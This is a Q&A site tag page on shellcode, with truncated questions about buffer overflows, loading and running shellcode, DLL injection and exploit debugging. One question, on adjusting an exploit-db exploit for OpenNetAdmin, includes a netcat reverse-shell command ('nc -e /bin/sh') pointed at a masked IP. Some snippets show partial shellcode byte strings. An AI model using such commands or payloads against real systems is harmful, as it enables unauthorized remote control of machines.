Questions tagged [shellcode]

A shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability.

Shellcodes get that name because they typically start a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient.

Shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote).

681 questions
-1 votes, 1 answer

Loading shellcode from file into char* produces strange characters at end of text

I have a char array[] and it is like the following: // MessageBox char xcode[] =…
user13342561
-1 votes, 1 answer

Loading long shellcode in memory in C

I want my shellcode to run on x86 arch, but a char array in C has a limit of ~16k, while my shellcode is longer. I broke the string into 2 arrays and started as follows: char n1qwgimnb8i[] = "\x75\x6d\xf2\x34..."; char n1qwgimnb8i1[] =…
-1 votes, 1 answer

What if system call number were 0 in a buffer overflow attack?

I'm learning buffer overflow with shellcode. In a shellcode to spawn a shell by system call to execve(). Things like mov $0x0, %eax can be replaced by xor %eax, %eax to avoid NULL in shellcode. But there's an int $0x80. Is the number 0x80 a…
1t3a
-1 votes, 1 answer

Manual mapping DLL never executes my MessageBoxA function

I am basically manual mapping my DLL into "notepad.exe". I am resolving imports, fixing relocations and executing my shellcode in the target process ("notepad.exe"), which should call my DLL entry point. The problem is I tried debugging it for…
zeroaceee
-1 votes, 1 answer

How to run 64-bit shellcode on 32-bit Linux machine?

I have this shellcode that only runs on a 64-bit machine: unsigned char shellcode[] =…
Mark
-1 votes, 2 answers

Bash Syntax Problems for Exploit

I found an exploit at exploit-db for OpenNetAdmin 18.1.1. I have to adjust this script so it works for me, but I can't get this done. This is what I have so far: URL="xxx.xxx.xxx.xxx/ona" while true;do echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx…
Soteri
-1 votes, 1 answer

Call a shellcode without using pointer to function?

Is there a way to get the return value of a function that is in the shellcode, without using pointer to function? #include unsigned char code[] = "\x55\x48\x89\xe5" "\xb8\x05\x00\x00" …
Yuri Albuquerque
-1 votes, 1 answer

Why can't I exit from shellcode with a syscall?

I am trying to make a program where you put in some assembled assembly in hex and run it. With simple instructions like int3 it works, but when I try to exit from the program with a syscall it doesn't work. I assembled it with rasm2 mov eax, 1 mov ebx,…
MaxSilvester
-1 votes, 1 answer

Difference between two keywords while using grep in bash?

What is the output difference between these commands? ps -ef | grep \[t\]tyS1 and ps -ef | grep ttyS1 The expected result is that the former will grep for [t]tyS1, but that is not actually happening.
-1 votes, 2 answers

Shellcode working, but not in a custom C program

My payload asm works, but I tried to embed it in my own C program it works. It connects to my nc port 4444, then breaks the connection. I don't know why this happens if I tested this example on my asm executable and it works perfectly, but in my C program not.…
user8706034
-1 votes, 1 answer

Shellcode in the signal handler

Why won't my shellcode (int3) be hit with the signal handler? Apart from not liking to have printf() in the handler, I care about how to deliver the shellcode (not as inline assembler) within the signal handler, being executed at runtime. However, I…
-1 votes, 2 answers

Pointer casting in C [shellcode test]

I'm following a tutorial on how to write a shellcode but I'm failing to understand what this pointer function casting is doing to the bytecode. Could someone explain this to me? char code[] = "bytecode will go here!"; int main(int argc, char…
-1 votes, 2 answers

Simple shellcode not working

I have the following code which is supposed to drop a shell; however, after I run the code nothing appears to happen. Here is the code that I have. This was taken from The Shellcoder's Handbook. char shellcode[] = …
user3431573
-1 votes, 1 answer

Segmentation Fault during Exploit

I tried to execute a shellcode with buffer overflow. Unfortunately I get a segmentation error. The following are the C code, ASM code and exploit code: C Code: int main(int argc, char **argv) { char buffer[64]; gets(buffer); } ASM Code: …
elguerrero
-1 votes, 1 answer

Running shellcode works in debugger, but not by itself

I'm experimenting with buffer overflows. I've written a toy example which does the following: building a buffer which consists of three parts: 1) a block with several "malicious" return addresses that overwrite the real return address on the…
Andy